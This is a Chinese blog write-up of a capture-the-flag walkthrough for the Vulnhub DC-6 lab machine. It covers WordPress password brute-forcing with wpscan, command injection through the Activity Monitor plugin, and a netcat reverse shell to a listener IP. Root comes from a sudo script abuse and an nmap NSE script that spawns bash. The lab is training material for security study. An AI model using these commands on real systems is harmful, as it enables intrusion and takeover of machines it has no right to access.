分享

Vulnhub dc-6靶机通关

 怡红公子0526 2022-10-20 发布于北京

测试步骤

       通过密码爆破登录后他->activity monitor漏洞拿到webshell->提权root

 

首先安装好靶机,这里我使用了VMware15,NAT模式,网段位192.168.147.0/24

通过局域网查看器得知靶机存在的ip

 

首先得到ip扫描一下端口号,得知靶机开放的是22,80端口

 

访问靶机发现是wordpress,那么就尝试之前的方法(dc-2靶机),使用wpscan爬取用户名,cewl爆破密码的方式

 

 

使用wpscan --url http://wordy/ --enumerate u获取用户名

 

使用wpscan --url http://dc-2 -e u --passwords wps.txt爆破密码。这里有个坑,使用cewl生成的字典爆破失败。查看官方给出的提示,使用以下字典的方式

Clue

 

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

 

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

爆破出了一个用户

 

使用账号密码登录后台处,看到activity monitor的插件,这个插件存在漏洞

使用searchsploit activity monitor搜索,后者直接百度的方法都可以

 

找到插件的位置输入内容抓包。然后拼接上想要执行的命令

 

命令执行成功,这里就可以直接反弹shell了,使用nc反弹shell

nc -nv 192.168.147.138 1234 -e /bin/bash

 

为了方便,生成一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

 

寻着以前的思路,这里肯定是不能提权的,需要找到具有/bin/bash权限的

 

去home目录下看看,在home目录下发现了4个用户,

 

进入到mark目录下,发现了graham的密码,接下来使用su切换账号

 

 

具有了/bin/bash权限,接下来就去提权,使用sudo -l,查看当前权限

 

这里根据前辈们的解释,可以运行jens用户下面的backups.sh

那么就切换到home/jens目录下,这里借一下其他师傅的图,我这里已经修改过了

发现这个脚本文件是对文件进行备份的

 

向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

 

切换到了jens用户下,执行sudo -l,发现可以使用nmap命令

 

首先确定一下nmap版本,然后百度搜索吧

       echo 'os.execute("/bin/bash")' > getShell.nse

       sudo nmap --script=getShell.nse

执行完命令,拿到了root用户

 

查看最终flag

 

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多